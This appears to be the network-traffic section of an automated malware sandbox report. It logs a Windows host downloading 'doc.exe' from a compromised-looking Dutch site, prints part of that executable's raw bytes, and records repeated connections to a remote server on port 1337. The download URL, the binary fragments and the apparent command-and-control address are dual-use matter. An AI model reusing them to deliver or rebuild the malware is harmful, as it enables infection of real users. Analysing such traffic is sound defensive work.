Feb 3, 2018 21:33:33.717787981 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.756985903 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.757000923 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.757009029 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.757097960 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.763978958 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.764003038 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.764013052 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.764142036 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.819775105 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.819801092 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.819823980 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.819931984 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.819952965 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.822907925 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.822932959 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.823050976 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.823070049 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.823664904 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.885297060 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.885328054 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.885335922 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.885466099 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.886349916 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.886368990 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.886379004 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.886735916 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.947076082 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.947103024 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.947120905 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.947282076 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.947297096 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.947674036 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.947865009 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.947890997 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.947911978 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.949969053 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.003745079 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.003767014 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.003782988 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.004025936 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.015109062 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.015130997 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.015146971 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.015278101 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.081104994 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.081127882 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.081142902 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.081343889 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.081357002 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.081914902 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.081937075 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.082022905 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.082039118 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.082761049 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.085967064 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.085990906 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.086002111 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.086059093 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.234534025 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.234555006 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.234565973 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.235024929 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.308722019 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.308752060 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.308759928 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.308842897 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.308860064 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.309932947 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.439316034 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.439347982 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.439368963 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.439506054 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.439510107 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.439521074 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.439536095 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.439548016 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.439878941 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:34.439893961 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:34.440264940 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:49.200720072 CET	64559	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:49.811691999 CET	53	64559	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:52.563671112 CET	59499	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:53.213628054 CET	53	59499	8.8.8.8	192.168.1.72
Feb 3, 2018 21:34:21.491626024 CET	49756	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:21.491661072 CET	1337	49756	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:21.491806984 CET	49756	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:21.620800018 CET	49756	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:21.620826006 CET	1337	49756	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:21.630920887 CET	49756	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:22.519992113 CET	49757	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:22.520023108 CET	1337	49757	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:22.524580002 CET	49757	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:22.608390093 CET	49757	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:23.578207016 CET	49758	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:23.578248978 CET	1337	49758	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:23.578597069 CET	49758	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:23.609343052 CET	49758	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:24.595082045 CET	49759	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:24.595125914 CET	1337	49759	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:24.595257998 CET	49759	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:24.876127958 CET	49759	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:25.608963013 CET	49760	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:25.609018087 CET	1337	49760	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:25.609327078 CET	49760	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:26.193576097 CET	58110	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:34:26.624386072 CET	80	49752	192.185.103.35	192.168.1.72
Feb 3, 2018 21:34:26.624393940 CET	49760	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:26.624419928 CET	1337	49760	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:26.624516964 CET	49752	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:34:26.816354990 CET	53	58110	8.8.8.8	192.168.1.72
Feb 3, 2018 21:34:31.639977932 CET	49760	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:31.640016079 CET	1337	49760	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:34.807271004 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:34:34.807439089 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:34:35.228861094 CET	57019	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:34:36.174961090 CET	53	57019	8.8.8.8	192.168.1.72
Feb 3, 2018 21:34:36.656390905 CET	49760	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:36.656423092 CET	1337	49760	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:38.186754942 CET	57063	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:34:38.728271008 CET	53	57063	8.8.8.8	192.168.1.72
Feb 3, 2018 21:34:39.285430908 CET	1337	49760	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:39.285542011 CET	49760	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:39.285840988 CET	49760	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:39.285871983 CET	1337	49760	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:39.828095913 CET	49766	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:39.828147888 CET	1337	49766	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:39.828309059 CET	49766	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:40.616110086 CET	1337	49766	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:40.616337061 CET	49766	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:40.616556883 CET	49766	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:40.616594076 CET	1337	49766	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:40.843194008 CET	49767	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:40.843236923 CET	1337	49767	213.183.58.7	192.168.1.72
Feb 3, 2018 21:34:40.844012022 CET	49767	1337	192.168.1.72	213.183.58.7
Feb 3, 2018 21:34:41.672847033 CET	49767	1337	192.168.1.72	213.183.58.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 3, 2018 21:32:10.561108112 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:11.567994118 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:12.571824074 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:14.582293034 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:18.602766991 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:20.473094940 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:20.611568928 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:20.611646891 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:20.611680984 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:20.611707926 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:27.988158941 CET	65509	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:28.871850014 CET	53	65509	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:56.336441040 CET	54798	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:57.384031057 CET	54798	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:57.650475979 CET	53	54798	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:58.414820910 CET	53	54798	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:19.252407074 CET	50993	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:20.213414907 CET	53	50993	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:22.028878927 CET	58503	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:23.030596018 CET	58503	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:23.613178968 CET	53	58503	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:24.137648106 CET	53	58503	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:49.200720072 CET	64559	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:49.811691999 CET	53	64559	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:52.563671112 CET	59499	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:53.213628054 CET	53	59499	8.8.8.8	192.168.1.72
Feb 3, 2018 21:34:26.193576097 CET	58110	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:34:26.816354990 CET	53	58110	8.8.8.8	192.168.1.72
Feb 3, 2018 21:34:35.228861094 CET	57019	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:34:36.174961090 CET	53	57019	8.8.8.8	192.168.1.72
Feb 3, 2018 21:34:38.186754942 CET	57063	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:34:38.728271008 CET	53	57063	8.8.8.8	192.168.1.72

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 3, 2018 21:32:58.414988995 CET	192.168.1.72	8.8.8.8	cf59	(Port unreachable)	Destination Unreachable
Feb 3, 2018 21:33:24.137844086 CET	192.168.1.72	8.8.8.8	cf59	(Port unreachable)	Destination Unreachable
Feb 3, 2018 21:34:13.588713884 CET	192.168.1.72	1.1.1.1	4d58		Echo

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 3, 2018 21:32:56.336441040 CET	192.168.1.72	8.8.8.8	0x3e	Standard query (0)	zwangerschapsyogaamsterdamwest.nl	A (IP address)	IN (0x0001)
Feb 3, 2018 21:32:57.384031057 CET	192.168.1.72	8.8.8.8	0x3e	Standard query (0)	zwangerschapsyogaamsterdamwest.nl	A (IP address)	IN (0x0001)
Feb 3, 2018 21:33:19.252407074 CET	192.168.1.72	8.8.8.8	0xa46e	Standard query (0)	zwangerschapsyogaamsterdamwest.nl	A (IP address)	IN (0x0001)
Feb 3, 2018 21:33:22.028878927 CET	192.168.1.72	8.8.8.8	0xde02	Standard query (0)	zwangerschapsyogaamsterdamwest.nl	A (IP address)	IN (0x0001)
Feb 3, 2018 21:33:23.030596018 CET	192.168.1.72	8.8.8.8	0xde02	Standard query (0)	zwangerschapsyogaamsterdamwest.nl	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Feb 3, 2018 21:32:57.650475979 CET	8.8.8.8	192.168.1.72	0x3e	No error (0)	zwangerschapsyogaamsterdamwest.nl	192.185.103.35	A (IP address)	IN (0x0001)
Feb 3, 2018 21:32:58.414820910 CET	8.8.8.8	192.168.1.72	0x3e	No error (0)	zwangerschapsyogaamsterdamwest.nl	192.185.103.35	A (IP address)	IN (0x0001)
Feb 3, 2018 21:33:20.213414907 CET	8.8.8.8	192.168.1.72	0xa46e	No error (0)	zwangerschapsyogaamsterdamwest.nl	192.185.103.35	A (IP address)	IN (0x0001)
Feb 3, 2018 21:33:23.613178968 CET	8.8.8.8	192.168.1.72	0xde02	No error (0)	zwangerschapsyogaamsterdamwest.nl	192.185.103.35	A (IP address)	IN (0x0001)
Feb 3, 2018 21:33:24.137648106 CET	8.8.8.8	192.168.1.72	0xde02	No error (0)	zwangerschapsyogaamsterdamwest.nl	192.185.103.35	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

zwangerschapsyogaamsterdamwest.nl

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.72	49751	192.185.103.35	80	C:\Program Files\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 3, 2018 21:33:23.623478889 CET	79	OUT	GET /wp-user/doc.exe HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: zwangerschapsyogaamsterdamwest.nl Connection: Keep-Alive
Feb 3, 2018 21:33:26.117784023 CET	80	IN	HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Sat, 03 Feb 2018 20:33:25 GMT Content-Type: application/x-msdownload Content-Length: 345600 Connection: keep-alive Last-Modified: Thu, 01 Feb 2018 12:35:29 GMT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 68 3a 72 5a 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3e 05 00 00 06 00 00 00 00 00 00 be 5d 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 5d 05 00 4b 00 00 00 00 60 05 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 3d 05 00 00 20 00 00 00 3e 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 02 00 00 00 60 05 00 00 04 00 00 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 05 00 00 02 00 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 5d 05 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 40 05 00 98 1c 00 00 03 00 00 00 11 00 00 06 58 6b 00 00 80 d5 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 15 00 00 0a 2a 1e 02 28 16 00 00 0a 2a a6 73 17 00 00 0a 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 73 19 00 00 0a 80 03 00 00 04 73 1a 00 00 0a 80 04 00 00 04 2a 1e 02 28 25 00 00 0a 2a 4a 02 28 25 00 00 0a 02 72 01 00 00 70 7d 06 00 00 04 2a a6 73 17 00 00 06 80 08 00 00 04 73 1d 00 00 06 80 09 00 00 04 73 20 00 00 06 80 0a 00 00 04 73 14 00 00 06 80 0b 00 00 04 2a 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 1b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 1c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 1d 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 1e 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 1f 00 00 0a 28 20 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 21 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 22 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 23 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 05 00 00 1b 2d 0a 28 01 00 00 2b 0a 2b 06 2b 04 02 0a 2b 00 06 2a 13 30 02 00 10 00 00 00 09 00 00 11 03 12 00 fe 15 05 00 00 1b 06 81 05 00 00 1b 2a 13 30 01 00 20 00 00 00 0a 00 00 11 7e 26 00 00 0a 8c 07 00 00 1b 2d 0a 28 02 00 00 2b 80 26 00 00 0a 7e 26 00 00 0a 0a 2b 00 06 2a 13 30 03 00 28 00 00 00 0b 00 00 11 28 27 00 00 0a 7e 0b 00 00 04 25 fe 07 15 00 00 06 73 28 00 00 0a 6f 29 00 00 0a 73 12 00 00 06 0a 06 6f 13 00 00 06 2a 13 30 0b 00 5c 0c 00 00 0c 00 00 11 7e 09 00 00 04 20 3c b0 c8 fe 20 2c f1 1f 06 59 20 63 68 9b eb 20 c9 88 84 1a 58 59 20 52 a6 44 6f 20 11 c2 56 7c 58 20 6e 18 1e c4 20 5b 70 66 56 58 58 59 20 1d 1e a0 77 20 25 a0 95 09 59 20 40 9d 13 67 20 d1 24 43 15 58 58 20 b4 b0 07 58 20 ba 67 16 6c 58 20 ab 1a 76 00 20 b0 55 f0 55 58 58 58 58 20 3d 41 91 3e 20 69 a8 49 38 61 20 8f 41 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELh:rZ>] `@ @p]K` H.text= > `.rsrc`@@@.relocD@B]H@Xk((ssss(%J(%rp}sss s0~o+0~o+0~o+0~o+0(( +0(!+0("+0(#+0-(++++00 ~&-(+&~&+0(('~%s(o)so0\~ < ,Y ch XY RDo V\|X n [pfVXXY w %Y @g $CXX X glX v UUXXXX =A> iI8a A
Feb 3, 2018 21:33:26.117819071 CET	82	IN	Data Raw: 95 24 20 6a a1 ff 1a 59 59 20 c6 0a 1c 7d 20 86 97 0f 1a 61 20 af b0 f5 2d 20 de 8b b2 18 59 58 58 20 9d 07 1f 6e 20 bc 62 18 44 58 20 0f a2 4e 5e 20 ab c5 c7 0d 58 58 20 f5 e0 50 4c 20 5e fa 26 4c 61 20 9b cd 42 ae 20 eb 77 52 58 59 58 58 59 58 Data Ascii: $ jYY } a - YXX n bDX N^ XX PL ^&La B wRXYXXYX (I UY ,aa V& 9X \|5 $VXYY S P)toX HT {Ya %h 1Ea " `]U:aYXY TL jwcX 2g- XX ]t fY 1 #YXX Dg UuY
Feb 3, 2018 21:33:26.117831945 CET	83	IN	Data Raw: 5b 72 fe 20 44 d6 1b 3e 59 20 11 95 f8 a6 20 88 ca df 7c 59 61 20 1e 9f 92 3e 20 42 94 d1 74 61 20 5c 6c db 6b 20 27 9e 80 6b 61 59 61 20 d4 ad b9 dc 20 74 41 38 01 61 20 3e 66 e6 ac 20 9e bc e7 46 59 59 20 3b ad 57 2e 20 96 df 1c 22 59 20 31 6a Data Ascii: [r D>Y \|Ya > Bta \lk 'kaYa tA8a >f FYY ;W. "Y 1jW KuMYaaX O~ "yRa Sj ZaX < 8Y = {UYaY e pt3a ?} vaX A` >X $ NnYXaXX Ne> 4X xu *pYa p?X N aaa L .
Feb 3, 2018 21:33:26.117860079 CET	84	IN	Data Raw: 72 98 06 59 20 1a 3a 0a 6c 20 6a 03 a3 17 59 61 58 58 61 59 20 ca 34 c4 07 20 aa 65 e1 53 59 20 d3 d6 0a 55 20 c8 cf 2c 44 59 61 20 b6 ef 95 0f 20 ce c7 bb 20 58 20 e3 91 cf 78 20 66 68 d1 44 59 61 58 20 32 b9 6b 27 20 7c 96 f3 01 59 20 ee 26 b4 Data Ascii: rY :l jYaXXaY 4 eSY U ,DYa X x fhDYaX 2k' \|Y & sY~YX 2* sY r XtXaaa 4 SY + ;vYa w { X j$ 69=XXX [QY a F_Ya ) `a ") }FYaaaY D c'Y x6v BYY q 8
Feb 3, 2018 21:33:26.117988110 CET	85	IN	Data Raw: 20 fd 3f 0c bf 20 03 fc d8 3f 61 20 4c 6e dd 72 20 1f 02 4c 6e 59 58 20 3d ce 00 b6 20 34 70 9c 70 58 20 d9 c7 4f 22 20 1c a6 8d 16 58 61 59 20 1e 66 9a 00 20 96 27 2b 22 58 20 e9 65 c3 c0 20 99 7e 81 6f 58 59 20 9d 42 92 fe 20 de 0c bb 31 61 20 Data Ascii: ? ?a Lnr LnYX = 4ppX O" XaY f '+"X e ~oXY B 1a eWbN aYYa O 4{nX J D40\|XY #/FY ir1 @XYX i}WPY 'A slXa $ =@Y 4o} JYXXYaa sO^ +0X 7Q YX c3> YhX L) ;#4XXY
Feb 3, 2018 21:33:26.182646990 CET	87	IN	Data Raw: 24 20 a5 3e 33 4a 61 61 58 59 20 a9 e4 39 91 20 ad 70 7d 6e 59 20 e8 3e 4f 92 20 b7 9f 2f 19 59 61 20 83 3a 3e 26 20 cd 6c 30 34 61 20 bf 93 43 6f 20 fa 92 b9 00 61 61 61 20 54 07 62 db 20 8a 66 20 22 61 20 2a d2 84 02 20 96 3a f4 3c 61 58 20 16 Data Ascii: $ >3JaaXY 9 p}nY >O /Ya :>& l04a Co aaa Tb f "a * :<aX 6"Y , tHaXXXXXX(&~o!o~ N \|ra y LO_\|XY xn" :AY =:XaY v f*Y U}U /Ya "U FY h Y}Xaaa -wGY C
Feb 3, 2018 21:33:26.182672977 CET	88	IN	Data Raw: 61 20 22 f9 29 91 20 7d ba f6 46 59 61 58 58 58 20 4b 7d 5b fb 20 f0 05 63 27 59 20 ef 78 36 76 20 42 08 b9 07 59 59 20 b0 6a a6 6a 20 9b 0c 38 45 61 20 ac d4 ae 23 20 1b 4b 81 3a 61 59 61 20 bb fc b0 25 20 9f 3b 74 72 58 20 48 a3 a8 02 20 85 c9 Data Ascii: a ") }FYaXXX K}[ c'Y x6v BYY jj 8Ea # K:aYa % ;trX H 1Xa :S 4UX XaYa u[Y ] M;Ya _W ]@a 7/Z _GXaa k;4 !IY V `aY YX w MXaYaaaa(&o(~t~o
Feb 3, 2018 21:33:26.182681084 CET	89	IN	Data Raw: 40 61 20 db d2 1a 4e 20 c2 e8 c2 58 61 58 59 61 20 df 1e a2 8d 20 69 7d 57 50 59 20 62 2c 47 2d 20 73 ac 6c 06 58 58 20 5d 8f d0 80 20 99 3d 9d 40 59 20 55 c4 e4 63 20 80 0a dd 4a 59 59 58 20 09 92 57 e7 20 54 4a 51 73 61 20 ad 16 94 da 20 37 2e Data Ascii: @a N XaXYa i}WPY b,G- slXX ] =@Y Uc JYYX W TJQsa 7.nYX $ Y G EaXXYYY L 2b6X h tzXX hK V]~X i{nG +XXY . =LjY `F &Ya ;I& Z)Y ~ =zXXYY +S P1&a R'Xa d> \Y
Feb 3, 2018 21:33:26.182811022 CET	90	IN	Data Raw: 20 4d f2 16 03 20 71 5e 29 7e 61 59 61 20 92 ed 61 54 20 4b 75 ad 4d 59 20 a0 c6 80 ba 20 2d 77 0f 47 59 61 20 12 29 6f d6 20 22 9a 79 52 61 20 c4 a1 31 11 20 ff e4 08 5a 61 59 61 58 20 16 0f ec 6f 20 46 93 00 1d 59 20 06 e2 b2 1c 20 ea 0d f8 35 Data Ascii: M q^)~aYa aT KuMY -wGYa )o "yRa 1 ZaYaX o FY 5aa #cX >XaY V #uRY n .XY A? pY d J9eYXYaY } moX Ay LoaX ~Y = XXY dG =eFX 3,B 1u]aY 2" Y c)
